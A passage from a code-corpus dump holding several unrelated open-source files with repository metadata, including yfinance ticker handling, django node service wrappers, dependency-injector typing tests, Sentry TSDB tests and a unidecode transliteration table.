example=cv.customer_id(),
description='Chronicle client id'
)
| 23.192982 | 101 | 0.71407 |
bbffe331ae78db1cb195eb77ac0e42dcb4014ea1 | 3,957 | py | Python | yfinance/tickers.py | pchaganti/yfinance | 8a8298044c117bb94bb48ccc85f6568516135465 | [
"Apache-2.0"
] | null | null | null | yfinance/tickers.py | pchaganti/yfinance | 8a8298044c117bb94bb48ccc85f6568516135465 | [
"Apache-2.0"
] | null | null | null | yfinance/tickers.py | pchaganti/yfinance | 8a8298044c117bb94bb48ccc85f6568516135465 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Yahoo! Finance market data downloader (+fix for Pandas Datareader)
# https://github.com/ranaroussi/yfinance
#
# Copyright 2017-2019 Ran Aroussi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import requests as _requests
from . import Ticker, multi
from collections import namedtuple as _namedtuple
from yliveticker import YLiveTicker
def genTickers(tickers):
    """Return a namedtuple of Ticker objects, one field per upper-cased symbol.

    ``tickers`` may be a list of symbols or a single comma/space separated
    string.
    """
    symbols = tickers if isinstance(tickers, list) \
        else tickers.replace(',', ' ').split()
    symbols = [symbol.upper() for symbol in symbols]
    objects = {symbol: Ticker(symbol) for symbol in symbols}
    return _namedtuple("Tickers", objects.keys())(*objects.values())
class Tickers():
    """Holds one Ticker per symbol plus a shared requests session."""
    def __repr__(self):
        return 'yfinance.Tickers object <%s>' % ",".join(self.symbols)
    def __init__(self, tickers):
        # Accept either a list of symbols or one comma/space separated string.
        tickers = tickers if isinstance(
            tickers, list) else tickers.replace(',', ' ').split()
        self.symbols = [ticker.upper() for ticker in tickers]
        ticker_objects = {}
        # One HTTP session shared by every Ticker created below.
        self.session = _requests.Session()
        for ticker in self.symbols:
            ticker_objects[ticker] = Ticker(ticker,self.session)
        self.tickers = ticker_objects
        # self.tickers = _namedtuple(
        #     "Tickers", ticker_objects.keys(), rename=True
        # )(*ticker_objects.values())
    def history(self, period="1mo", interval="1d",
                start=None, end=None, prepost=False,
                actions=True, auto_adjust=True, proxy=None,
                threads=True, group_by='column', progress=True,
                **kwargs):
        # Alias: forwards every argument unchanged to download().
        return self.download(
            period, interval,
            start, end, prepost,
            actions, auto_adjust, proxy,
            threads, group_by, progress,
            **kwargs)
    def download(self, period="1mo", interval="1d",
                 start=None, end=None, prepost=False,
                 actions=True, auto_adjust=True, proxy=None,
                 threads=True, group_by='column', progress=True,
                 **kwargs):
        """Download history for all symbols and cache each slice on its Ticker."""
        # Always fetch grouped by ticker so the per-symbol slices below work;
        # the caller's group_by preference is applied afterwards.
        data = multi.download(self.symbols, session=self.session,
                              start=start, end=end,
                              actions=actions,
                              auto_adjust=auto_adjust,
                              period=period,
                              interval=interval,
                              prepost=prepost,
                              proxy=proxy,
                              group_by='ticker',
                              threads=threads,
                              progress=progress,
                              **kwargs)
        for symbol in self.symbols:
            # NOTE(review): the {} fallback would raise AttributeError if a
            # symbol were missing from self.tickers; both are built from
            # self.symbols in __init__, so that path appears unreachable.
            self.tickers.get(symbol, {})._history = data[symbol]
        if group_by == 'column':
            # Caller asked for column-major grouping: swap the column levels.
            data.columns = data.columns.swaplevel(0, 1)
            data.sort_index(level=0, axis=1, inplace=True)
        return data
    def live(self,
             on_ticker=None,
             on_error=None,
             on_close=None,
             enable_socket_trace=False):
        # Start a YLiveTicker stream for all symbols, wiring the callbacks
        # straight through.
        YLiveTicker(ticker_names=self.symbols,
                    on_ticker=on_ticker,
                    on_close=on_close,
                    on_error=on_error,
                    enable_socket_trace=enable_socket_trace)
| 34.408696 | 74 | 0.575941 |
ec722b1aeed5106b395d1dfc9f31482926f0f34e | 352 | py | Python | ex3.py | Oliviaha/python-the-hardway | 680ed0594878507b368ece0e58f87a6126746dcf | [
"MIT"
] | null | null | null | ex3.py | Oliviaha/python-the-hardway | 680ed0594878507b368ece0e58f87a6126746dcf | [
"MIT"
] | 1 | 2019-11-10T17:37:00.000Z | 2019-11-10T17:37:26.000Z | ex3.py | Oliviaha/python-the-hardway | 680ed0594878507b368ece0e58f87a6126746dcf | [
"MIT"
] | null | null | null | # -*-coding: utf-8 -*-
# Python 2 exercise script: arithmetic precedence and comparisons.
# (The Korean string literals are program output and are kept verbatim.)
print "닭을 세어 봅시다."
# / binds tighter than +: 25 + (30 / 6) == 30 (integer division).
print "암탉", 25+30 / 6
# * and % bind tighter than -: 100 - ((25 * 3) % 4) == 97
print "수탉", 100-25 * 3 % 4
print "이제 달걀도 세어 봅시다."
# (4 % 2) == 0 and (1 / 4) == 0 under integer division, so this prints 7.
print 3+2+1-5+4%2-1 / 4+6
print "3+2 < 5-7 는 참인가요?"
# 5 < -2 is False.
print 3+2 <5-7
print "3+2 는 얼마죠?", 3+2
print "5-7은 얼마죠?", 5-7
print "아하 이게 False인 이유네요"
print "더 해볼까요."
print "더 큰가요??", 5 > -2
print "더 크거나 같나요?", 5>= -2
print "더 작거나 같나요?", 5<= -2
53e6b4d72a1b7b850319e10ac601ac47e1ed32ef | 3,702 | py | Python | django_frontend_tools/services/__init__.py | markfinger/django-frontend-tools | 442f7e2267d96572ed0065ba192a906499ff3741 | [
"MIT"
] | null | null | null | django_frontend_tools/services/__init__.py | markfinger/django-frontend-tools | 442f7e2267d96572ed0065ba192a906499ff3741 | [
"MIT"
] | null | null | null | django_frontend_tools/services/__init__.py | markfinger/django-frontend-tools | 442f7e2267d96572ed0065ba192a906499ff3741 | [
"MIT"
] | null | null | null | import os
import sys
import json
import hashlib
from django.utils import six
from django.conf import settings
from django_node import npm
from django_node.base_service import BaseService
from django_node.exceptions import NodeServiceError
from ..settings import CACHE_AUTOPREFIXER, CACHE_LESS, CACHE_COMPRESSED_CSS, CACHE_COMPRESSED_JS
from ..exceptions import (
MissingArgumentError, AutoprefixerError, LessCompileError, CSSCompressionError, JSCompressionError
)
# Install this package's node dependencies at import time.
# Temp fix so that the services are only installed once
# TODO: fix in django-node and backport
npm.install(os.path.dirname(__file__))
class CachedService(BaseService):
    """Base node service whose responses may be cached.

    Subclasses toggle caching via the ``CACHE`` class attribute.
    """
    CACHE = True

    def generate_cache_key(self, serialized_data, data):
        """Return a SHA-256 cache key, or None when caching is disabled."""
        if not self.CACHE:
            return None
        return hashlib.sha256(serialized_data).hexdigest()
class AutoprefixerService(CachedService):
    """Run CSS through the node ``autoprefixer.js`` service."""
    path_to_source = os.path.join(os.path.dirname(__file__), 'autoprefixer.js')
    CACHE = CACHE_AUTOPREFIXER
    def autoprefix(self, css, options=None):
        """Return ``css`` with vendor prefixes added.

        Raises AutoprefixerError if the node service fails.
        """
        params = {
            'css': css
        }
        if options is not None:
            params['options'] = json.dumps(options)
        try:
            response = self.send(**params)
        except NodeServiceError as e:
            # Convert node failures to AutoprefixerError, preserving the traceback.
            six.reraise(AutoprefixerError, AutoprefixerError(*e.args), sys.exc_info()[2])
        return response.text
class LessService(CachedService):
    """Compile LESS sources through the node ``less.js`` service."""
    path_to_source = os.path.join(os.path.dirname(__file__), 'less.js')
    CACHE = CACHE_LESS

    def compile(self, path_to_file, options=None):
        """Compile the LESS file at ``path_to_file`` and return the CSS text.

        Raises LessCompileError if the node service fails.
        """
        params = {'path_to_file': path_to_file}
        if options is not None:
            params['options'] = json.dumps(options)
        try:
            response = self.send(**params)
        except NodeServiceError as e:
            # Convert node failures to LessCompileError, preserving the traceback.
            six.reraise(LessCompileError, LessCompileError(*e.args), sys.exc_info()[2])
        return response.text
class CompressCSSService(CachedService):
    """Minify CSS through the node ``compress_css.js`` service."""
    path_to_source = os.path.join(os.path.dirname(__file__), 'compress_css.js')
    CACHE = CACHE_COMPRESSED_CSS
    def compress(self, css, path_to_file=None, options=None, prepend_to_relative_urls=None):
        """Compress ``css`` text or, failing that, the file at ``path_to_file``.

        Raises MissingArgumentError when neither source is given and
        CSSCompressionError when the node service fails.
        """
        params = {}
        if css is not None:
            params['css'] = css
        elif path_to_file is not None:
            params['path_to_file'] = path_to_file
        else:
            raise MissingArgumentError('compress_css requires either `css` or `path_to_file` arguments to be defined')
        if options is not None:
            params['options'] = json.dumps(options)
        if prepend_to_relative_urls is not None:
            params['prepend_to_relative_urls'] = prepend_to_relative_urls
        try:
            response = self.send(**params)
        except NodeServiceError as e:
            # Convert node failures to CSSCompressionError, preserving the traceback.
            six.reraise(CSSCompressionError, CSSCompressionError(*e.args), sys.exc_info()[2])
        return response.text
class CompressJSService(CachedService):
    """Minify JavaScript through the node ``compress_js.js`` service."""
    path_to_source = os.path.join(os.path.dirname(__file__), 'compress_js.js')
    CACHE = CACHE_COMPRESSED_JS

    def compress(self, js, path_to_file=None, options=None):
        """Compress ``js`` text or, failing that, the file at ``path_to_file``.

        Raises MissingArgumentError when neither source is given and
        JSCompressionError when the node service fails.
        """
        if js is not None:
            params = {'js': js}
        elif path_to_file is not None:
            params = {'path_to_file': path_to_file}
        else:
            raise MissingArgumentError('compress_js requires either `js` or `path_to_file` arguments to be defined')
        if options is not None:
            params['options'] = json.dumps(options)
        try:
            response = self.send(**params)
        except NodeServiceError as e:
            # Convert node failures to JSCompressionError, preserving the traceback.
            six.reraise(JSCompressionError, JSCompressionError(*e.args), sys.exc_info()[2])
        return response.text
| 30.85 | 118 | 0.667477 |
c5e17817820367d703e0a94146bd9418cb813849 | 1,371 | py | Python | Route.py | axydavid/Maze-Robot | 9cf26f4894ad735d6ba60bd8c5a3d991c77fb23a | [
"MIT"
] | null | null | null | Route.py | axydavid/Maze-Robot | 9cf26f4894ad735d6ba60bd8c5a3d991c77fb23a | [
"MIT"
] | null | null | null | Route.py | axydavid/Maze-Robot | 9cf26f4894ad735d6ba60bd8c5a3d991c77fb23a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 02 12:03:17 2015
@author: Dong
"""
class Route:
def __init__(self, file_name): # "route.txt"
self.file_name = file_name
def get_routeList(self):
count = 0
routeList = []
route = open( self.file_name, "r")
route.seek(0, 2)
size = route.tell()
print "Read String is : %i" % size
route.seek(0, 0)
while count < (size+1)/8:
count+=1
gridData = []
count1 = 6
while count1 != 0:
str = route.read(1)
if str.isspace() == False:
count1-=1
strInt = int(str)
print "Read String is : %i" % strInt
gridData.append(strInt)
routeList.append(gridData)
route.close()
return routeList
# Test code:
#for gridData in Route("testStraightLine.txt").get_routeList():
#
# print gridData
| 17.1375 | 63 | 0.355215 |
e70ae67a123615c05bfdccf47d34faa5e398506a | 2,461 | py | Python | tests/typing/resource.py | VKFisher/python-dependency-injector | c26b260c73ab36985e05e117af934ca6170ff9de | [
"BSD-3-Clause"
] | null | null | null | tests/typing/resource.py | VKFisher/python-dependency-injector | c26b260c73ab36985e05e117af934ca6170ff9de | [
"BSD-3-Clause"
] | null | null | null | tests/typing/resource.py | VKFisher/python-dependency-injector | c26b260c73ab36985e05e117af934ca6170ff9de | [
"BSD-3-Clause"
] | null | null | null | from typing import List, Iterator, Generator, AsyncIterator, AsyncGenerator, Optional
from dependency_injector import providers, resources
# Test 1: to check the return type with function
def init1() -> List[int]:
return []
provider1 = providers.Resource(init1)
var1: List[int] = provider1()
# Test 2: to check the return type with iterator
def init2() -> Iterator[List[int]]:
yield []
provider2 = providers.Resource(init2)
var2: List[int] = provider2()
# Test 3: to check the return type with generator
def init3() -> Generator[List[int], None, None]:
yield []
provider3 = providers.Resource(init3)
var3: List[int] = provider3()
# Test 4: to check the return type with resource subclass
class MyResource4(resources.Resource[List[int]]):
def init(self, *args, **kwargs) -> List[int]:
return []
def shutdown(self, resource: Optional[List[int]]) -> None:
...
provider4 = providers.Resource(MyResource4)
var4: List[int] = provider4()
# Test 5: to check the return type with async function
async def init5() -> List[int]:
...
provider5 = providers.Resource(init5)
async def _provide5() -> None:
var1: List[int] = await provider5() # type: ignore
var2: List[int] = await provider5.async_()
# Test 6: to check the return type with async iterator
async def init6() -> AsyncIterator[List[int]]:
yield []
provider6 = providers.Resource(init6)
async def _provide6() -> None:
var1: List[int] = await provider6() # type: ignore
var2: List[int] = await provider6.async_()
# Test 7: to check the return type with async generator
async def init7() -> AsyncGenerator[List[int], None]:
yield []
provider7 = providers.Resource(init7)
async def _provide7() -> None:
var1: List[int] = await provider7() # type: ignore
var2: List[int] = await provider7.async_()
# Test 8: to check the return type with async resource subclass
class MyResource8(resources.AsyncResource[List[int]]):
async def init(self, *args, **kwargs) -> List[int]:
return []
async def shutdown(self, resource: Optional[List[int]]) -> None:
...
provider8 = providers.Resource(MyResource8)
async def _provide8() -> None:
var1: List[int] = await provider8() # type: ignore
var2: List[int] = await provider8.async_()
# Test 9: to check string imports
provider9: providers.Resource[dict] = providers.Resource("builtins.dict")
provider9.set_provides("builtins.dict")
| 23.438095 | 85 | 0.687525 |
32941effd5de1a1c804ca9eda3218d1cb7c7eae3 | 908 | py | Python | tests/analyzers/test_annotation_detector.py | WebArchivCZ/WA-KAT | 719f7607222f5a4d917c535b2da6371184222101 | [
"MIT"
] | 3 | 2017-03-23T12:59:21.000Z | 2017-11-22T08:23:14.000Z | tests/analyzers/test_annotation_detector.py | WebArchivCZ/WA-KAT | 719f7607222f5a4d917c535b2da6371184222101 | [
"MIT"
] | 89 | 2015-06-28T22:10:28.000Z | 2017-01-30T16:06:05.000Z | tests/analyzers/test_annotation_detector.py | WebarchivCZ/WA-KAT | 719f7607222f5a4d917c535b2da6371184222101 | [
"MIT"
] | 1 | 2015-12-17T02:56:59.000Z | 2015-12-17T02:56:59.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
from wa_kat.analyzers.annotation_detector import get_annotation_tags
# Variables ===================================================================
TEST_TEMPLATE = """
<HTML>
<head>
<meta name="description"
content="Popis stránek.">.
<meta name = "DC.Description"
content = "Description of the web.">
</head>
<body>
Somecontent.
</body>
</HTML>
"""
# Tests =======================================================================
def test_get_annotation_tags():
    """Both the plain meta description and the DC description are extracted."""
    tags = get_annotation_tags(TEST_TEMPLATE)
    meta_tag, dc_tag = tags[0], tags[1]
    assert meta_tag == "Popis stránek."
    assert meta_tag.source == "Meta"
    assert dc_tag == "Description of the web."
    assert dc_tag.source == "DC"
| 25.222222 | 79 | 0.511013 |
6c42d18b8d1ff317bfad416cf999065b8fa5f18c | 4,614 | py | Python | tests/sentry/tsdb/test_snuba.py | kinghuang/sentry | 5c22673994a62f54a782d1c595852986ccc51ae9 | [
"BSD-3-Clause"
] | 1 | 2019-10-17T17:46:16.000Z | 2019-10-17T17:46:16.000Z | tests/sentry/tsdb/test_snuba.py | kinghuang/sentry | 5c22673994a62f54a782d1c595852986ccc51ae9 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/tsdb/test_snuba.py | kinghuang/sentry | 5c22673994a62f54a782d1c595852986ccc51ae9 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
import pytz
from datetime import datetime, timedelta
from sentry.testutils.cases import OutcomesSnubaTest
from sentry.tsdb.base import TSDBModel
from sentry.tsdb.snuba import SnubaTSDB
from sentry.utils.dates import to_timestamp
from sentry.utils.outcomes import Outcome
def floor_to_hour_epoch(value):
    """Truncate ``value`` to the start of its hour and return a Unix epoch int."""
    hour_start = value.replace(minute=0, second=0, microsecond=0)
    return int(to_timestamp(hour_start))
class SnubaTSDBTest(OutcomesSnubaTest):
    """get_range() tests for outcome counters at org and project scope."""
    def setUp(self):
        super(SnubaTSDBTest, self).setUp()
        self.db = SnubaTSDB()
        # Set up the times: a 7-day query window ending now, one reference
        # point inside the window, and one just before it starts.
        self.now = datetime.now(pytz.utc)
        self.start_time = self.now - timedelta(days=7)
        self.one_day_later = self.start_time + timedelta(days=1)
        self.day_before_start_time = self.start_time - timedelta(days=1)
    def test_organization_outcomes(self):
        """Org-scoped counters include only this org's in-window outcomes."""
        other_organization = self.create_organization()
        for tsdb_model, outcome in [
            (TSDBModel.organization_total_received, Outcome.ACCEPTED),
            (TSDBModel.organization_total_rejected, Outcome.RATE_LIMITED),
            (TSDBModel.organization_total_blacklisted, Outcome.FILTERED),
        ]:
            # Create all the outcomes we will be querying
            self.store_outcomes(
                self.organization.id, self.project.id, outcome.value, self.start_time, 3
            )
            self.store_outcomes(
                self.organization.id, self.project.id, outcome.value, self.one_day_later, 4
            )
            # Also create some outcomes we shouldn't be querying:
            # a different organization, and a time before the window.
            self.store_outcomes(
                other_organization.id, self.project.id, outcome.value, self.one_day_later, 5
            )
            self.store_outcomes(
                self.organization.id, self.project.id, outcome.value, self.day_before_start_time, 6
            )
            # Query SnubaTSDB with hourly (3600s) rollup.
            response = self.db.get_range(
                tsdb_model, [self.organization.id], self.start_time, self.now, 3600, None
            )
            # Assert that the response has values set for the times we expect, and nothing more
            assert self.organization.id in response.keys()
            response_dict = {k: v for (k, v) in response[self.organization.id]}
            assert response_dict[floor_to_hour_epoch(self.start_time)] == 3
            assert response_dict[floor_to_hour_epoch(self.one_day_later)] == 4
            for time, count in response[self.organization.id]:
                if time not in [
                    floor_to_hour_epoch(self.start_time),
                    floor_to_hour_epoch(self.one_day_later),
                ]:
                    assert count == 0
    def test_project_outcomes(self):
        """Project-scoped counters include only this project's in-window outcomes."""
        other_project = self.create_project(organization=self.organization)
        for tsdb_model, outcome in [
            (TSDBModel.project_total_received, Outcome.ACCEPTED),
            (TSDBModel.project_total_rejected, Outcome.RATE_LIMITED),
            (TSDBModel.project_total_blacklisted, Outcome.FILTERED),
        ]:
            # Create all the outcomes we will be querying
            self.store_outcomes(
                self.organization.id, self.project.id, outcome.value, self.start_time, 3
            )
            self.store_outcomes(
                self.organization.id, self.project.id, outcome.value, self.one_day_later, 4
            )
            # Also create some outcomes we shouldn't be querying:
            # a different project, and a time before the window.
            self.store_outcomes(
                self.organization.id, other_project.id, outcome.value, self.one_day_later, 5
            )
            self.store_outcomes(
                self.organization.id, self.project.id, outcome.value, self.day_before_start_time, 6
            )
            # Query SnubaTSDB with hourly (3600s) rollup.
            response = self.db.get_range(
                tsdb_model, [self.project.id], self.start_time, self.now, 3600, None
            )
            # Assert that the response has values set for the times we expect, and nothing more
            assert self.project.id in response.keys()
            response_dict = {k: v for (k, v) in response[self.project.id]}
            assert response_dict[floor_to_hour_epoch(self.start_time)] == 3
            assert response_dict[floor_to_hour_epoch(self.one_day_later)] == 4
            for time, count in response[self.project.id]:
                if time not in [
                    floor_to_hour_epoch(self.start_time),
                    floor_to_hour_epoch(self.one_day_later),
                ]:
                    assert count == 0
| 40.473684 | 99 | 0.626355 |
bcb2df6db38cabb539b12a7a8150ce742b50fe59 | 4,602 | py | Python | Lib/site-packages/unidecode/x05c.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 82 | 2020-03-28T02:24:38.000Z | 2022-03-30T04:18:42.000Z | Lib/site-packages/unidecode/x05c.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 118 | 2020-03-14T17:34:11.000Z | 2022-03-30T07:07:45.000Z | Lib/site-packages/unidecode/x05c.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 30 | 2020-06-20T15:31:53.000Z | 2022-03-06T06:23:55.000Z | data = (
'Po ', # 0x00
'Feng ', # 0x01
'Zhuan ', # 0x02
'Fu ', # 0x03
'She ', # 0x04
'Ke ', # 0x05
'Jiang ', # 0x06
'Jiang ', # 0x07
'Zhuan ', # 0x08
'Wei ', # 0x09
'Zun ', # 0x0a
'Xun ', # 0x0b
'Shu ', # 0x0c
'Dui ', # 0x0d
'Dao ', # 0x0e
'Xiao ', # 0x0f
'Ji ', # 0x10
'Shao ', # 0x11
'Er ', # 0x12
'Er ', # 0x13
'Er ', # 0x14
'Ga ', # 0x15
'Jian ', # 0x16
'Shu ', # 0x17
'Chen ', # 0x18
'Shang ', # 0x19
'Shang ', # 0x1a
'Mo ', # 0x1b
'Ga ', # 0x1c
'Chang ', # 0x1d
'Liao ', # 0x1e
'Xian ', # 0x1f
'Xian ', # 0x20
None, # 0x21
'Wang ', # 0x22
'Wang ', # 0x23
'You ', # 0x24
'Liao ', # 0x25
'Liao ', # 0x26
'Yao ', # 0x27
'Mang ', # 0x28
'Wang ', # 0x29
'Wang ', # 0x2a
'Wang ', # 0x2b
'Ga ', # 0x2c
'Yao ', # 0x2d
'Duo ', # 0x2e
'Kui ', # 0x2f
'Zhong ', # 0x30
'Jiu ', # 0x31
'Gan ', # 0x32
'Gu ', # 0x33
'Gan ', # 0x34
'Tui ', # 0x35
'Gan ', # 0x36
'Gan ', # 0x37
'Shi ', # 0x38
'Yin ', # 0x39
'Chi ', # 0x3a
'Kao ', # 0x3b
'Ni ', # 0x3c
'Jin ', # 0x3d
'Wei ', # 0x3e
'Niao ', # 0x3f
'Ju ', # 0x40
'Pi ', # 0x41
'Ceng ', # 0x42
'Xi ', # 0x43
'Bi ', # 0x44
'Ju ', # 0x45
'Jie ', # 0x46
'Tian ', # 0x47
'Qu ', # 0x48
'Ti ', # 0x49
'Jie ', # 0x4a
'Wu ', # 0x4b
'Diao ', # 0x4c
'Shi ', # 0x4d
'Shi ', # 0x4e
'Ping ', # 0x4f
'Ji ', # 0x50
'Xie ', # 0x51
'Chen ', # 0x52
'Xi ', # 0x53
'Ni ', # 0x54
'Zhan ', # 0x55
'Xi ', # 0x56
None, # 0x57
'Man ', # 0x58
'E ', # 0x59
'Lou ', # 0x5a
'Ping ', # 0x5b
'Ti ', # 0x5c
'Fei ', # 0x5d
'Shu ', # 0x5e
'Xie ', # 0x5f
'Tu ', # 0x60
'Lu ', # 0x61
'Lu ', # 0x62
'Xi ', # 0x63
'Ceng ', # 0x64
'Lu ', # 0x65
'Ju ', # 0x66
'Xie ', # 0x67
'Ju ', # 0x68
'Jue ', # 0x69
'Liao ', # 0x6a
'Jue ', # 0x6b
'Shu ', # 0x6c
'Xi ', # 0x6d
'Che ', # 0x6e
'Tun ', # 0x6f
'Ni ', # 0x70
'Shan ', # 0x71
None, # 0x72
'Xian ', # 0x73
'Li ', # 0x74
'Xue ', # 0x75
'Nata ', # 0x76
None, # 0x77
'Long ', # 0x78
'Yi ', # 0x79
'Qi ', # 0x7a
'Ren ', # 0x7b
'Wu ', # 0x7c
'Han ', # 0x7d
'Shen ', # 0x7e
'Yu ', # 0x7f
'Chu ', # 0x80
'Sui ', # 0x81
'Qi ', # 0x82
None, # 0x83
'Yue ', # 0x84
'Ban ', # 0x85
'Yao ', # 0x86
'Ang ', # 0x87
'Ya ', # 0x88
'Wu ', # 0x89
'Jie ', # 0x8a
'E ', # 0x8b
'Ji ', # 0x8c
'Qian ', # 0x8d
'Fen ', # 0x8e
'Yuan ', # 0x8f
'Qi ', # 0x90
'Cen ', # 0x91
'Qian ', # 0x92
'Qi ', # 0x93
'Cha ', # 0x94
'Jie ', # 0x95
'Qu ', # 0x96
'Gang ', # 0x97
'Xian ', # 0x98
'Ao ', # 0x99
'Lan ', # 0x9a
'Dao ', # 0x9b
'Ba ', # 0x9c
'Zuo ', # 0x9d
'Zuo ', # 0x9e
'Yang ', # 0x9f
'Ju ', # 0xa0
'Gang ', # 0xa1
'Ke ', # 0xa2
'Gou ', # 0xa3
'Xue ', # 0xa4
'Bei ', # 0xa5
'Li ', # 0xa6
'Tiao ', # 0xa7
'Ju ', # 0xa8
'Yan ', # 0xa9
'Fu ', # 0xaa
'Xiu ', # 0xab
'Jia ', # 0xac
'Ling ', # 0xad
'Tuo ', # 0xae
'Pei ', # 0xaf
'You ', # 0xb0
'Dai ', # 0xb1
'Kuang ', # 0xb2
'Yue ', # 0xb3
'Qu ', # 0xb4
'Hu ', # 0xb5
'Po ', # 0xb6
'Min ', # 0xb7
'An ', # 0xb8
'Tiao ', # 0xb9
'Ling ', # 0xba
'Chi ', # 0xbb
'Yuri ', # 0xbc
'Dong ', # 0xbd
'Cem ', # 0xbe
'Kui ', # 0xbf
'Xiu ', # 0xc0
'Mao ', # 0xc1
'Tong ', # 0xc2
'Xue ', # 0xc3
'Yi ', # 0xc4
'Kura ', # 0xc5
'He ', # 0xc6
'Ke ', # 0xc7
'Luo ', # 0xc8
'E ', # 0xc9
'Fu ', # 0xca
'Xun ', # 0xcb
'Die ', # 0xcc
'Lu ', # 0xcd
'An ', # 0xce
'Er ', # 0xcf
'Gai ', # 0xd0
'Quan ', # 0xd1
'Tong ', # 0xd2
'Yi ', # 0xd3
'Mu ', # 0xd4
'Shi ', # 0xd5
'An ', # 0xd6
'Wei ', # 0xd7
'Hu ', # 0xd8
'Zhi ', # 0xd9
'Mi ', # 0xda
'Li ', # 0xdb
'Ji ', # 0xdc
'Tong ', # 0xdd
'Wei ', # 0xde
'You ', # 0xdf
'Sang ', # 0xe0
'Xia ', # 0xe1
'Li ', # 0xe2
'Yao ', # 0xe3
'Jiao ', # 0xe4
'Zheng ', # 0xe5
'Luan ', # 0xe6
'Jiao ', # 0xe7
'E ', # 0xe8
'E ', # 0xe9
'Yu ', # 0xea
'Ye ', # 0xeb
'Bu ', # 0xec
'Qiao ', # 0xed
'Qun ', # 0xee
'Feng ', # 0xef
'Feng ', # 0xf0
'Nao ', # 0xf1
'Li ', # 0xf2
'You ', # 0xf3
'Xian ', # 0xf4
'Hong ', # 0xf5
'Dao ', # 0xf6
'Shen ', # 0xf7
'Cheng ', # 0xf8
'Tu ', # 0xf9
'Geng ', # 0xfa
'Jun ', # 0xfb
'Hao ', # 0xfc
'Xia ', # 0xfd
'Yin ', # 0xfe
'Yu ', # 0xff
)
| 17.76834 | 19 | 0.389831 |
892885dbd6acfe44b6e8529e25a762fe30249854 | 662 | py | Python | labrat/catcher.py | jangler/labrat | fd557cfd2d8f103072fd1366b50c42363eeb254d | [
"MIT"
] | null | null | null | labrat/catcher.py | jangler/labrat | fd557cfd2d8f103072fd1366b50c42363eeb254d | [
"MIT"
] | null | null | null | labrat/catcher.py | jangler/labrat | fd557cfd2d8f103072fd1366b50c42363eeb254d | [
"MIT"
] | null | null | null | """
This module provides a call wrapper for tkinter that displays
exceptions in a messagebox.
"""
import traceback
import tkinter
import tkinter.messagebox
class Catcher:
"""A call wrapper for tkinter that displays exceptions in a messagebox."""
def __init__(self, func, subst, widget):
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except Exception as e:
traceback.print_exc()
tkinter.messagebox.showerror(type(e).__name__, str(e))
| 23.642857 | 78 | 0.625378 |
fb10002562dac07ad1f28af904d77f8b8394301a | 2,439 | py | Python | kotori/userdata.py | jffifa/kyotogang-toolset | 4c8e62e475b8f0a3885c03cce483d012bc267f6c | [
"MIT"
] | null | null | null | kotori/userdata.py | jffifa/kyotogang-toolset | 4c8e62e475b8f0a3885c03cce483d012bc267f6c | [
"MIT"
] | null | null | null | kotori/userdata.py | jffifa/kyotogang-toolset | 4c8e62e475b8f0a3885c03cce483d012bc267f6c | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import uuid
import cPickle
import os
from gconf import GConf as gconf
class UserData(object):
"""stage1st session
"""
def __init__(self):
self.uuid = uuid.uuid3(uuid.NAMESPACE_DNS, gconf.BASE_URL)
# encode a string password to big integer
def _encode(self, password):
res = 0
b = 0
mask = self.uuid.int
for ch in password:
res |= (ord(ch) ^ (mask & 255)) << b
b += 8
mask >>= 8
if mask == 0:
mask = self.uuid.int
return res
# decode a big integer into string password
def _decode(self, enc_password):
passwd = ''
mask = self.uuid.int
while enc_password > 0:
ch = enc_password & 255
passwd += chr(ch ^ (mask & 255))
enc_password >>= 8
mask = mask >> 8
if mask == 0:
mask = self.uuid.int
return passwd
# return a list of tuples (username, password)
def load_user_data(self, filepath=None):
if filepath is None:
filepath = gconf.USER_DATA_PATH
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
if not os.path.exists(filepath):
f = open(filepath, 'wb')
cPickle.dump([], f, 2)
f.close()
f = open(filepath, 'rb')
try:
encUserData = cPickle.load(f)
except:
raise Exception('Cannot pickle user data correctly. Please remove the user data file and retry.')
return map(lambda (x,y): (x,self._decode(y)), encUserData)
# user data should be a list of tuples (username, password)
def save_user_data(self, userData, filepath=None):
if filepath is None:
filepath = gconf.USER_DATA_PATH
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
encUserData = map(lambda (x,y): (x,self._encode(y)), userData)
f = open(filepath, 'wb')
cPickle.dump(encUserData, f, 2)
f.close()
# test case
if __name__ == '__main__':
ud = UserData()
passwd='kotori@9my_little_angel狂三小天使@kula-fans'
x = ud._encode(passwd)
print x
y = ud._decode(x)
print y
print y == passwd
#ud.save_user_data([('test', passwd)])
print ud.load_user_data()
| 30.111111 | 109 | 0.566626 |
e6bfbf303cca63c8f7174f60d7095967c78bff0d | 5,018 | py | Python | src/ddqn.py | shuyangw/cs682-final-project | ccc751fbf36380d37d90a6e51d6e7c27608b8506 | [
"MIT"
] | null | null | null | src/ddqn.py | shuyangw/cs682-final-project | ccc751fbf36380d37d90a6e51d6e7c27608b8506 | [
"MIT"
] | null | null | null | src/ddqn.py | shuyangw/cs682-final-project | ccc751fbf36380d37d90a6e51d6e7c27608b8506 | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
class DDQNCNN(object):
